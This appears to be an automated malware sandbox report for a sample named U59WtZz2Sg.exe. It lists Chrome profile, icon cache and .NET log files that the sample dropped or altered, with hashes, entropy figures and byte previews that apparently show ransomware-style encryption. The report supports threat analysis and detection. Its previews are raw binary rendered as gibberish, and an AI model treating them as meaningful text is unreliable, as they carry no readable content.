Preview:	.PNG........V.....(..o...{...$...v.....v.].8p]iHm..F.{...i....(.Z}......."..&7M..Y....e.'.+.j.iB..9.C..TXjKT&.7.<.YS...}a8..y.../..++...p..R..0.. ...}..S..T..C&..-.G3..R...t.6.....D.<.........l.o!..X.6..I..u3_.'.....8....u.KLO..-..:.H..Pc$.h.....(Z....drm..y...L..0Q..qF..i[..S...&9..s..'@..^u..P;...EM...@..$#]&d.....3.8..F..Y..N.`.hTz.tm..Q.[......N.a..=...,..+3.j.}.2..u\|.K........Y...B)a.T.I.&.k.W..GJ...8V....?.n.....#.U..+...r..W...4.Tt.O.Ks5o.e..K...^..Ch..?_e..s.U"../.......T/W?..!.)..S...p5..0..ma........<.6.:....0..M\|.F.t,N..}....-Bz/..1s.X....$...D.q..+..\|Q...L. ,.K...].G.{....5..c9....=...P.C..E.o.a....@.f..k....5...E.....a0.+}...E...;?..P.....]YB.N.<mh..@......`7....t..IQ0.k7..R.....Iv.t.q+]Y.nAT.....{u..r....6...,.......j.`f...J...T.S..:....#5ik/K....l.....D.8kL.\;g..9..-..DR\3:.[..........{\|.m..I.q....D.+.-'.j/mQ....H..7"w.....V=2..0.Q.i....A.".oA...k..[.u5...g....f.._.......0..../.Oo.r.@.....]S}.6..j~.......8...eU.z..)j

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	12565
Entropy (8bit):	7.98577116595789
Encrypted:	false
SSDEEP:	192:tnaT8L7F+ZqehTslgzLm/FKEqfEzaTq2gWiCuoStvMCxQo9j8PDQIGovmzu0kCxi:8TFsV4JqaTqbpCuNECLEMev0KCUaSl/7
MD5:	DE208AFF6F5CFF3510A414EC7862ED8D
SHA1:	FBFE9188009EDF556DF5531B5A5EB4882B3FD038
SHA-256:	BEF9B1BB0ADC79F4A388536C577EE2FE9076FCCCB6134FF1D270C2BD0E998EE0
SHA-512:	6728CEA5F10DFB0E9FFBB1D25251710116177E5CC3696452B86EBC67CD4BE613E01940C1342ACD36AD4AFC7FA41AE953D4B42255846A200CD98B5697C641C04F
Malicious:	false
Preview:	.PNG.......<.<.D >.....,....g.0.n.p.<E/.{.3...,.F..XD.......B.d....}.D.v...2JT..ZU..27.,}[...W...w.....Y.....h.............:.2.....N...q#W..I"..G.~.S?@.....p.zp1"..!(a..`..p.eE\uZJ..........T?!.,l....GV9Sa.9F(S..(.>....q..1...c........xkA....w.....9..r7L\|y.~.F....Bgt._.M..cL...5M......gK2G....,.l%!..\..r...r.5nq..#;x?.p9..d.8.1A.C...."....~..&...u................].....c.8..Lq.Si......>w.djGt};T.<.A.'I..L....n.,Q................r..Ed:n@. ..c....5...]./..j.S..r..a_Ro...`.vg...[F....-.>...jU.Q....2.9....-n+=.?a...L.3.WL.?!..Pq...7...l.t._....D.........b.e[.).._.../..[.B..H.n..2....8...Nb.S`..T\.W.a5[{.wt....V.E.~.J. .C....\....,y{..W.,e\......5.D...vL..ul..a..='9..Q.....<..........$s.O`..G..zL...`..>........8...T:O.W.uI.I{..O/O.=/[.<...(NkE..VX.U/o.d.H.J...\B.`lV..H....]..@.z..s..A.6IJ......}.D....#.... .......^._.n[]n...M.N.(..8...F2.....Yt\|....C..Fx....e6.v..5$...p%.S...^..x.CwamE.....R..K.c...*f..^0.^....vKT(..dk..3...7.2..n..S..........L

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	modified
Size (bytes):	1892
Entropy (8bit):	7.899129168187769
Encrypted:	false
SSDEEP:	24:HQDBQOL4wjo78FLBJ9qb/qWK1zXF+pwdP2myKC/M9CDD9C6wbLm+7EDbDV/gkbD:HQDBD48vJeSWuLw4y7DM6SLhERguD
MD5:	C949FF5D28256F640D6B8A1CE55E7682
SHA1:	197D72C48FC584C65FFFD2D1DA83D42284C91920
SHA-256:	69A2E91E1F25251D058AC3653B102C2BD98F438A8CBDD974E6E154A62C5C09E5
SHA-512:	7307EEC444F718E6F2404770AB7D18B722758AC9A9A3ED1FD05D998586F3644BB78C647FDCCE121BEF96CC3573289160B326C68252581DCE1EBA6394A2404A69
Malicious:	false
Preview:	.PNG....x.{.+..%..W.9..0:.h./.'......r".._....U+X4t........7..Ed^.1..im..........Aa...k2....A.].5t.q.xLa..Z'..&.tx.s...H;..Wh.......-../.8`>.:QBT.....aXG.......fgm..$..`..h^F.^H.@.#.8Z..k.0X....j.{.o../....C/....D...A.....4...L.......Cx...,_..]..}..H~.f;.\|[/+.].;....J0)9..[..P...=.u.'E..oh....;.n^.].2.`.i.r2v......(..b..../..c.`..^..T.e...- M..;".VX.U`#>O...x3... .........H...].R../k.1....K...Mu%.Q.K..z.......&.2.....\|,.N...l.....M..Dh.mS.QB]Dg..v^.8.:..L..]D...r..3.uA^.\...mX..j..F}T...__.....mU....cU....`\|%..x.I1.`.....+d;..R_..]".b.R2N6W....6NNW.G...S}q.}......y=..%)A:.6.-b~aC%t.....2...b..:S.N6.o.......b-.dL.r.G.z@e.hj..;..N.?...%o....(=....&-.......k.........2.-..Z..h..g.&.l._.+e.).-?Hyv........t3.;-R...s.&M.6~..."'.&;..NmC......g.Vo.{s..;,..H.J..2..s2.w9'.'}.a.Tg.g.+..G....r8(<NA..N....1J...(.<U....!k.>.z;..={..K..C..t.HvX%IK.`...r...\|.0........d9.0.4.c/....p../....v.S..9..Hq./.".....Ycq\.!.^.f.....d@._..O.}}..L1.g.......P.fm.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	29006
Entropy (8bit):	7.991880391735602
Encrypted:	true
SSDEEP:	768:qqdVVFhH8RewqoC2rn+xgB0YUhM7U4WYQ5G:5QRQ2630WFG
MD5:	748B6BDC6485525FB0CF69600F6D7F78
SHA1:	3824D24C2CB20786E9C488191208B4FC397907A6
SHA-256:	43638BEFA8B0B05D089F7A8FDE78F3CB68E4F627F2BAD87380E45A16525D9CEF
SHA-512:	4444BD5178F5471B40EA91BCE473C796122E556EB735A706A094E4F538DF09EFF1CE1BA92C60DA6F1E704D73B93C16689B4065D6F039A5706B0F616F391D5183
Malicious:	true
Preview:	SQLit&.........'...\|..P..O..SA...... w../.,-.3a...Q.,0y{....OG..H.1..$d...P.1....F.H;#.dB.,b>.E.%.(.#LG.)\|..j.x=8.rG>&..hU....G..Y.Z.&.g.9_..&W...r.m..F.Sk..>x.....Sg.R.i..YL..iNX...O..X..c..-..y@)Vu.....x..........k.%...?Zl\.!.....}.>..T....f\..Y@@.....I..@}.}.^..QbX....V8@).!zN.2...\|RS.pn..~y.al.aJ.P/.....'+.-.....x..L...........:...n.Tt../...)=e7..N..{.>.lqg.)P!.....Ql...l...&^... Ru..#."..].`..\.:/"<40w......b.;..,..w.......`K\5...r~1......=d...c..0.'.6.L.V.v........J..)n.......5T.../EF.a{.d[uE.v...4s.7.-x.K64.n./...y'=v,...6#">...e......K.].......... ..%7..w......r.ljJ,.7!..._.b`L.{.+...s.%..O.{Q...y"...f.fZ..@.z...n..rRr..gTW<.P.......\| \|.t...5..p.e}<.4.:q....-.....e....8=.e.2...../5...MV.e..\..oO..X.<.E..2.^l......V1].W...w.....Q.r.s....X......x.Jx...5{.3..1n.......c9.>\.>..`.tC...Z.C,4n{N..W.no...L...K.]M.B..b.9..1......q]&....5i.%+Q..j.....Qo.........<.o,..l......ua+XB....>.tx.v...a.V."P*.....}..:.GN...L.4=...HG... +v].z\|...7w.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.988537338661867
Encrypted:	false
SSDEEP:	384:PCSB8OI5cCk4j2atfBM4RbWGISQX1DXElHPcRY68hhlyqFj7S9:PjbIFk94JM4RbcvX1DXExcpoDlFj70
MD5:	FF28AB9157240A6D13A91D0CF9D44792
SHA1:	CDE40184515C3EF577C2C146E016E0CF8F3BDF3B
SHA-256:	DEC9B6611067CBE43BB7111973DE6B4BCA32C6F786785EE60DFD1B99C2F0B534
SHA-512:	8A28364D1819BB0F17E4F14B4917DCC274C2E2DEC0B99E1A224E36A3E438728125B24FACCDEF82E1EE1B21E42BA30502EBFA4ACA3C7615C64A8DDFB6C8E99D0F
Malicious:	false
Preview:	SQLit/N.....<+.{P.D>...EB.K..U...rY.dv>... ..2...8..<...61{e..h......L..>U...y....I.....`>....E...0}.V^.nEYy..x.....4J....+.7....H..z8......'..N.X.g...+u..F........I..$.7.H.(M;..e..D.s......7.=......x...%..6.fQ...%{.kT.9.6<.D.5..>k.s4.'.B.@..N..[.."d....~....\>0..B.W.....5.zf...}...."*..^.5q.x?r..A.J.....z..b.#...UePjHu...N.d...d......\|[..L.}(..9...\|....x....Y@.P]....@..3...Z5Z.'&<.>'".<.......O.2.v8.l."^..v"..;.......,..6..\|...+z....3.>..{9b...L`7.5M.e.S.....m.g...../Q.4..'VM_.....y.-Jp..)^.{.{...C=.uf{.=.Md.WF.O....\|6{`l..^..h.0.~aH.IB..?..M.h..H....\xLK.?X9.a.g..@O...j..L.....O.0...@..9&..'..K.!....=f...?F..o..+,m0..4.....;.l.......H.d..\.....w(....Nn....(.....>.......p.iFZM....#.RAi.2.S'...]......4.x<.&.s'.s........8W.'...\|.].+P.LQ..G...~..18...DBG..H..X'.M....X.iI.4.0x...:.TZI).....3.!MVUO... .-...I..?.j..z5.U...;...`......J...(.<...6.......].t%.....:..C.0.@.,vR.:{+.<<.6.+....Wx.C.H..:.wG..RS..../.2m.B...Dy9.74]...J..2....[G...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.988298566665822
Encrypted:	false
SSDEEP:	384:ywhA+fttrQ99vnyrFj9UyUNTDrda/RIvyljhdhcd:yWjfttrunkqR1IQ6hu
MD5:	A45C3F65662C028B528036AC28018945
SHA1:	38EB93C44ECB77B41BED640BE81C3D03CA89607D
SHA-256:	091B328625B8CC28991F0045A85AEA67D5E76548DAFC0492B15FB83B64FA7915
SHA-512:	03B28486A159FAA25D12A2EF9F099582BE4426B8DCA8C96C24EAD56183B1A76BB922C86FC3D4BF15A4C71DB17EF310CDF370206A9292DFD7142603FE46988E9C
Malicious:	false
Preview:	SQLit[j..x3}...d....^...$).=j}N.Bq%X...\| .A4........}.....&S...\|........t..{%&=..q...e...-7..rZ......7A...-.n....!..f...b..z......Q...m....w........i...ucy.Q....S.n>...'BZw....Hvr.$.Q..s.....Sl&e.a..&v?....-.]:.&_.b....+.b.7C.........k...J.[....G".;!.CI..o..q .D...6$.S..O..]..r.....p8...V@Ia...s.!K.Y.dP.R....%].S._KH"`.)..0.Xr...Hg.+.\|...<.9.5...].D......re..A..v...,.c...!.f...C.n......=.U.8.4ci..}a...c.!B.a...9)[+@y.3n.<.-#&W.z..d..Xaf;U.r..{.2.....$..E..5N.......~g...x..........;.,.....8...83.UX..3%]C.....);.%dR..8.eWhH..''....E.o......a...}.y.'.I....c..$.....I&..[..j..%..T.."...V. ..A..p...rj5..O.I.....W..=.6[.#t........u.c.r;.. .Q.)..b.U.........0.I.>.....#L..{$(.......k#..~O.....dN. ...p.b....cc.J......t....&.e.."'Ep.../.s{..1...<Y.. .j...T.I...-..g...`..R......TG.D..(.1..m.r.x..Bqy3...[.[.*(..@...........iE........_P{.\....-..}...b....N+X......z..w....=.:k.m..O......./#...g..m.......0.....L;.9)s.w.....'.1..A..<....1zkwB...@... &.o`.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1066
Entropy (8bit):	7.807638670941954
Encrypted:	false
SSDEEP:	24:lOiESxmQwYSC7t0wZizVM55JskEfsXsUbD:l1xm9Y1ZiCHJsdOpD
MD5:	F581A0EB2AAB13EF0BA5F9CB9F84214A
SHA1:	167EE7953A0AE12DFDB413AD510309C5E3190EC5
SHA-256:	EF6D539BDAA2E04C3F97D0D70864860A2D41ED27BB8BC8EA4480162FD12F9610
SHA-512:	11A60F308F2E801E3C130191BD49C97F6C98F031F463A36BD076A1E033B97D7A7A97E41D3EE517C7AC1504F4FD1D0EF7A543715FADBE657B903D28D400A7FD10
Malicious:	false
Preview:	A..r....$.;.f...[.L....DEB.G.D..x..t..r..N.+K..N.....J...V...C......2.;HB..yu.K.1O..u.0g,..~..~.6~.cH>.X..U..$.%..dS7...2.l...i.K..Z#%0./.."0..A.A...\|....p..%.h...b...kJW..I.(..<..x,A.04.a....Fg..vc.$.....a.J"><2..o.._..R..s.... p...?g..Qa.._.....\|.U..h5h./....>.J.y.Z.~.p..Y........n.-P.S@.U 4.<?......>.<T.kJ..w-..j...O.@....."...d.<.e%......k.GG.._......W.J..../2Or.U.........,.lX.f...........J.N{.;..0g...e..$....D..0.;.bn%woW.....G..v.R.......C.n..x._..[....a..[.8._2..h......g'..a..w..c....V...>..}.x+^...5X..[.....^^.........,.l.....(l..U...xZR...p..C.....{..D&.6%1....uca..&i...4.d.l..p../Z..'W.s.{=.....V.,.^..S./..y.qM.\|..%{}.....Ph.4`X.]>n..../>..~..[.\r.&'......)..z.%7...`S....i.z..{...z...V....#...L.f.r...=...57.....V....].-..R0..A...C...!}.Yc..>.q\|.N...)HL.._.<.vP.........3&..G9.U..PZUC..T.6.....W^...]YF=,{...]E.)i.l.x..C.Q]c.m..a.......'.....l............^......hn}."...#.\..Y..Q.7t.6'Z...p;Q....\|...K..b.g.....]....E.....;K6te1YGPnIbo

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1061
Entropy (8bit):	7.7843666279256665
Encrypted:	false
SSDEEP:	24:esIRm/KUhH4RKwIC1//YH95PkfSNCsqDjs7XTubD:etRmieYRZv/aLsfDsowgD
MD5:	DC7CECB780FA46F49F3E3658461D7DF6
SHA1:	95C09F59D78049ED1E4D6B0F06873CE393313D46
SHA-256:	B1633335E2A16B7ED94D5A7F617B6F038E100675882FE87E50C2FB88B1629754
SHA-512:	CCF4C1FA6AD7D83D3ED69623556C1443D89E0AA34FA1D21C93A4339109ABDA2137F2EA2AD3BEC24B4194FD4A863DAC9897842224CF646D78505A64CA4CCCC994
Malicious:	false
Preview:	.DO&.h....qN.B..n........V+$.0u..D.U..,..&..DX1..v..4.2......:..v_....(J..[.].h..t...U.z)T l..Ud.X.Q..3.M....f.2]..8y.....R...h:.7$..D...X.........S.....Z...*..O.....;..+3.M......GSX....N....Tl..f.a..Wml..."....!.]..c....E.....z>...[."...:.:..3)'v..d..~T....w......-...N....US.....ue.-.z....o.0l...K..eL............s.h....$P. .e.}.......\|W.h+[TY..bs.9dZ......a._.'.[".A.YV...c...S......;..`.cGv...h+.....6.Y..jk..\|F.[..~..@./Q.VY...;...o.O...".B...:....S_'.4:l.b...;..no..;.v>.P.f.........zJC.:.YZ<...:.<.Vx.H........p\Pk..)..7...f.7.\|.....#"0..)....k.%g...V..U.sV...`.,.7y.....[CZ&.^...tH^ .-......;{l..d.jV4S+...<..2.3#X ..@.\.T.l...!................;.!LG..I.97....;.e1".f.P.%)l......T..#..L5...hpM....q..u...\.MK.n.q...0..[T9..Q>..:\...n..6q.......&....}..#.7..."..H2..;...d=M.7.B..0..n.NVM.x,6.gt.....guO..............1......i..Z..Q ..1....%c.6Q..%.F....}....>.....~>..6~.@QOF7..E.D..]Mn.@.....].n.....!.Z....T.l..[.3U.N.S..aK6te1YGPnIbo4GcGO

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	483
Entropy (8bit):	7.481380602966872
Encrypted:	false
SSDEEP:	12:o9sitj9dyW0stawMtYcz8nh1ntyQzgVV8STYtcii9a:GsitjzXLawM8nTvgVV8fbD
MD5:	DCCC373C50642EB3CFD515D6FCED268A
SHA1:	70F52AD0EE7190FC464B63D57FFE59A9EC46FBC1
SHA-256:	E273869A30365B3646B6132746D33C10C8803E1DF096426159F1986C5AB4E1FC
SHA-512:	EC403BA6DB351F2FF1F0FBCF56F07DA3ACEA8B69B3B6481BA691CEB019FAD4DA95B8586530C97151680E46C8AAE4183D5CE798F5511837E3F39194D83FD4FC60
Malicious:	false
Preview:	2020/$n\|j.j......d....bo..80......<$y]..s....0.3.n..s`..i...&.Nze.5j 8.0..&.jT.q........'...]3....Y.z.....k.YkWK@!..WJ[....5..........v^.-...t.@..:_IH..r..SY T2.%.!\|rW.KvU.v..L.....4.;[..v.[.)..Z.....}:.he..lfi.oE...oFc.x..H~hAr..Y.drx.c..(.G.D.Jw..:;...;L6..3..l..\|.....\[.<heJ......k2.e.Q......\-......}:G.v+.4A........2.Hg..=.RxB...e.,q..U..z.]F....3.Y.'......o..)s.... ..} .-.Z..{x,K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\IconCache.db

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18296
Entropy (8bit):	7.988657311597812
Encrypted:	false
SSDEEP:	384:9Qk4Kqfac/W+6cfC0RupGnDCpswxKRtocMppx/Q+n/Ufj:9PxqCjcqquyDqtYRtocMpt8fj
MD5:	1687E79B59F47F0E5786C181DA45FBB7
SHA1:	D8B4BB4F2B9E492E85BD8FC99780F0D4375D8027
SHA-256:	64F8B5DF1B8FAF64E58E10F89823818E338A066D623AB3C15CE126912A61F207
SHA-512:	FE22A926D788128C4D6ED0DF73B6B380E966F2E6E489762A9DBE61F6052577FC0BDDAA42A21F332DE351607B0FC336572F0E7823A88EFB1B657AC505947A95BD
Malicious:	false
Preview:	H...W.,...U..?..G[d)..>1....CC./..I..H.,_.=..O......&p.x........'1........mW...j...1..#?....W..X7.^.....B\|C.#{.+(..b....u.`..~W..!p.S]q...H..y..k...9..I..w$..lF...0.U..Q...1..,.Bn..hS...0.f..!..q.iy...g".rH'.D....rG@5..N..+.-.3...u]...G"....C.eW.%....0D.x2!.\.Z.W.....!j=....zT..2.I^a......./..Ug..G...KrH....v9..J..rr..i........Ne.':.%.0.......}.Q..{:..j.....Ku......\h.PO.E......@ep..t.EZ...._.<.n.az:Wsn..K.]8.._N....c<AgY...2.L.m..V..."<.'...O..6#....#...B..;vMa...iE...[.....o@.m..{t....`.3..2.R.O^...S3{>......Q.s..e...4.3../....H.=..G..{....I..".\...[....?..S.G.K.f.z.o^..e.PX.Dh...._.......E....t...inJA....W<p....# }...+.].]..........i.vq.w`P]M..".o6..W1.l[...pedR..j..q..G.p.g.h.k.P..V..=8..'.N....@8/.......D.ld.R.n..C.C.1#.?nx..b+...Nz....$..n.......hL<.%.W."...N......q..f..A.[.......:7...o. ...*......@;.{.......G..K....19p1...Gu......Wk.&YP.D....n......8...2M....p..\|v.T.s....r._.@y6X..f.....o3.&.....AY.KL.-.f:S].$E.\.

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	537
Entropy (8bit):	7.548926528026075
Encrypted:	false
SSDEEP:	12:QlKPH/PMFrm/ZskGhJkbjW5okNUaEHv0yQWgAldtcii9a:Lsm/ZecZaUgApbD
MD5:	05D38523CAFBEBE6EBB274416DBE166C
SHA1:	F9A81D70F04E2B94CA832775F4707B735F788C29
SHA-256:	32C8CBC6523373ECFE8A17EBF04D8F8FC1C183D8E42D55C1662A5CB61D9DE080
SHA-512:	50685788E076A9BF6CA547C0132161A0941C47B45D8A870878C61916A7A90D7EF6AAD0AE6B923B4359012D1F5A763DC14F988E0C8BE6A9A5DCEA62AAD294B5B3
Malicious:	false
Preview:	1,"fu ..a:...........=M"l..%./r.M.!(qB.\E.....-.A\..+6U.....r.U.b.tN...1....^.%D.V....=Be......p.0z..S....#.....=b..P/...[.f,".j.N"...O.+.JF...BV..........W!..5".W..P..._Anc...)..J.-..\|..........7a.<FL4......4.s.1R...x&B.d.v#`u!.......^...........d..&.I..S.).gi4...Q.8\...A..V....?Y......2c\|ns%.O..q.^..".0?k.J..".9........ESZ.14.nH...b..>40...>.\p.w..S.l..^#.>K.=@......{%...y.(.f....#.)...i#y.^!;../..b_.>.fMC...d..[..9=.37....L...O$.S.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	7.360185954216639
Encrypted:	false
SSDEEP:	6:QujwMI4q7mi8OWyAM2Wrb9kuyBUv8e7KZVeo80Z06vXMICJ8VkDGxntHcii96Z:Qkwrtmi8jmrb9zyBhbH3/h8Io8Btciik
MD5:	D11CA32ADD269F8DF99258B64CAC5BD7
SHA1:	A8B55C036EFFEB52DBB764CA5E936A98A321A241
SHA-256:	0FAC78C28DF0465A2864AA6FA988BF3DF5338C200696B098064D234F8469CC04
SHA-512:	F8C6EC5D21822D7512C2611286235D07EC67FE8A58129E56DCFB161F88D8620F00760620DE383CB6A2392677F4EEBAB12D6FE6285F86F9BE84230031450E6A5A
Malicious:	false
Preview:	1,"fu..`.......).Y...LiC.U\|}..O.W....6y.`!...D.!M...n).*t..y=....D$.N.....o.2.#.>O..j...U...[i~.X&.J.Ns.D><.....=0+.....g..`..pr.[.N...:\0f........t..Cw....;.m+.k.....x....,........l...F....,..%.c.x...@..n..O..Q}...n.c6%..y.A.s5RtS...i(o.Zq..^../:..w..<N~.d<..>.&NK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6137
Entropy (8bit):	7.969986613934111
Encrypted:	false
SSDEEP:	96:KsR1WV426HVpu7LXVp0A3YfeUBUbq7eXblzOjdmOslc09/szu+qhQaZJ0b9:04bHVonlpn3Y25bIjh9C+qmaZKb9
MD5:	610F49B34979023C36409C2A8E903DAB
SHA1:	18AAB99005D9EC2051A2E465EE14156E038D17DB
SHA-256:	FF90912B9C4213C5DB5A28D428EAE200719F84BA42CCB351427C4BE27C754EF3
SHA-512:	A8FC0100D89E4D849508D56F42B0CF661E6B2A6EFF0C2A6D37D254AF99D67C6645A038E9EB2E8B917901CA0222A13B54D79F13AE0F90749664CC85CB7E485CF6
Malicious:	false
Preview:	1,"fu...n..~`NU_.........\2.....+.;l..,.ES..JIa.!.TJ..3.\|.Tf..m}..,...M..g.{.`..[..=...VcT......\]Y2L..#... b.5 ..p.o2..]...#....=V.{#...O.Vd...;.@.O..9..+........~>.......T...E25.sI....'c...O.....,rY.?....&.Oq.....'&........%J....."%KJ.L............c.....-..zC!..7.....l..R.09.4xaM4iN....f$....Spo."S..hL$...2.h.L.mD.S..B.5.......1H...>V......3c....d.U...I.w.+....-.gb&tS\........md.._... ....5&f.....#+v......fY.x.t,.'....vO...p.A!....D..x..=.e.n..._...]...8o../......?..........R.kV5..[%J+.Q..j........03:B......?-.p.....:K..T.Y....QQ(.O.;[....#!.'.^$`Za_.RH...uY{...1...U....J@;.iFy4....D....$`3..K.^.a..d.)..U. <..I?..1.3s.w"....o-..?..[.....X_....7P...?.X......-I..zx..<..K..}W.w...i..v...K.?..Z.....`^..h..T..P.w..'..=.....f..`5r.nR.../i..Fp.';...=.;...,C.Fk..\|.,..+#.a.O.S..m..~RM..,p...n...]...z@...v1_......`..<..s.4...@...3]....x......i9v.m..8g4SR7..SM.w.m...;. ...o>#....r.....?....).`g*.%........@.c:...3....I.......E6./.62..w..)...U

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	7.753429729080011
Encrypted:	false
SSDEEP:	24:XMWxXV8mVC2099/BU3q/Js7piy+6cVXKDuTmkDic9bD:XXxX+mVg/BU3qBUpX+9JJf9D
MD5:	7EC1DBCAE5E0927CEE9A1BE7D1975C1E
SHA1:	899796FDB5383F32FCBB3D8015FDE0D30A00CBF3
SHA-256:	80842D723128BA755171BCE4140C2AF8F9BA54E842A43E3FD7EE861536BCF471
SHA-512:	FCFC6731A4648A56C3CD65D785B631AE7BD543169EF8F55D2CD3DDDA454953E11176DDC2BF4FA3E854EEF1F99E294E1E145A9E76A6CECC0FFA23D212091FDDF2
Malicious:	false
Preview:	1,"fu83.v..y.9.P.A.l....[^j.x.u.Y~...W.]..B.........8./.....J....^9..+....N...m.........<kRv.[R...z.V.0E....Y._.N..P...M...=m}.w0;.!+..1.......l.hrr..&Y. .......?h..U..\.L...{.-.....5...R.....#..yU..n...z.........X?.h.>...:....XnE;.3u.\.........GK.]......U...;y.4=;.".L..h...D... u2...=...Q.......4&.....}ON.I......X:.....(t.U...,a.0.;...........K.....)...2j....~.xp..E6Y....f.~.s.e........W.....O.!....U...A.U.WZ..+.4.V.......DWz.H5.x50.Irx....V..d@l..v.4r....j.ht7e.jn....`.G(^SL.o...$:...K.L...1..."(.sx....G..!.%.M .O...RC..1..L<.0..eAn..97.A.F9.J.W'H....%...9O.V..2w.tf....X..{..Q.I.....qdRw....S.{#.+.s.U-M$1.Q.$.o.......`....7.....T.j{?...KB....fJ.E`...7f....L.....>.I~.hb'q8P_,.........!..d,x.Sk."...G..P.7....&w!....k..SD.....TK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\ngen.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	667
Entropy (8bit):	7.681109403281856
Encrypted:	false
SSDEEP:	12:/k5Q8ESbk8QZQo33ZAwJyvYoTb9ekXK+wSvS+9NDbpwQwFcyISFNHtcii9a:c57E3nZAwJ+vTb9eOwSK+98FZFrbD
MD5:	F54F1385243622C29B327CB22C7D5275
SHA1:	0752C9D32A7C677C02D10B4D2BB520145D668F24
SHA-256:	D6286EEA30083206B996A29675B8DE311D5C28EBACE396B884EE2B5E5B4139CC
SHA-512:	A077756742A82B888275AD05B9BCF79F58538B6B6EDB2B4EC9C04D241B15C69FB3FBB8391C946937AC8214BF243A41900C1B41B94425CF3280AD0E83A9CB96F2
Malicious:	false
Preview:	.To.b.....y.>./.......Z...Gc...p.9"..F..@.2..lc...y.+.Y...H..Q4.......-4G.".f.s2.8...ZQ..-...z..K.f.R-m....{.<^.+..3f.@...@......).$......\|..6&2..._.M.......^.5.;.eX....^l...U.@r..E......_.X.s......Oe.j+..V...c.Z.f...=.sCb..A...RP-..?.g.@z[8...\..}....)..t..g+d.N.Y....I...J..,.c.M8....H..e.!0.#...!.u..{Ynd]...*0...x..C....\|..kv%....H.....@.\..U.[-....I.....)...../.-.3U....d..qBd...............=....U......fT.....).J....5..y(..98.O.Q.tW.~.:!.J.0..[..r.......3...T.`&T.........[.?_5..5[..(W..\|-.N..u.h.P>.rg. ...=.[..=. ....6;..a..IM..../n...............j3..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\8P7RGF10\www.microsoft[1].xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	568
Entropy (8bit):	7.539754164276685
Encrypted:	false
SSDEEP:	12:1PBbk3Q1jHwaRnDZ6wuWeKBbf/ZTB9dsMiRlle2tcii9a:FS3qHwcDteKBbfRygQbD
MD5:	CFC732D5624E0AEDAC4C639F6C2F70A6
SHA1:	D3FB3343A5F6FC679DAA3C52A6A871520E26AB02
SHA-256:	E86B0EC55EE34B21F595E0852B1BBEAE49B0C9BF20B9CB5627660F4B7397F76E
SHA-512:	52904E5106C24D29116B36E23A107AEA00CC2C05E8485198517AF3309F30115689C67AE4066F99CDBB0C93BFA5079FF762634BE809941516DDAC9817FF25C695
Malicious:	false
